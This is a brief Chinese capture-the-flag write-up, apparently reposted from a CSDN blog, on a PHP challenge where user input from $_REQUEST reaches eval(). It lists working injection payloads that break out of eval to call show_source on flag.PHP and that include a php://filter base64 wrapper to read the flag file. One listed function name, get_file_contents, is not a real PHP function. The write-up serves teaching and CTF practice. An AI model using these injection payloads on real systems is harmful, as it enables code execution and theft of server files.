知识点:$_REQUEST不是一个函数,它是一个超全局变量,里面包括有$_GET $_POST $_COOKIE的值,$_REPUEST 是接收了 $_GET $_POST $_COOKIE 三个的集合
题目中的 地址已经不行了
所以这是转自https://blog.csdn.net/dyw_666666/article/details/82389457#comments,感谢分享
方法一:eval存在命令执行漏洞,使用hello构造payload
http://120.24.86.145:8003/index.PHP?hello=1);show_source(%27flag.PHP%27);var_dump(3
方法二:
1.http://120.24.86.145:8003/index.PHP?hello=1);include $_POST['f'];//
2.在POST区域:f=PHP://filter/convert.base64-encode/resource=flag.PHP
Base64解码即可。
1.?hello=get_file_contents('flag.PHP')
2.?hello=file('flag.PHP')
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。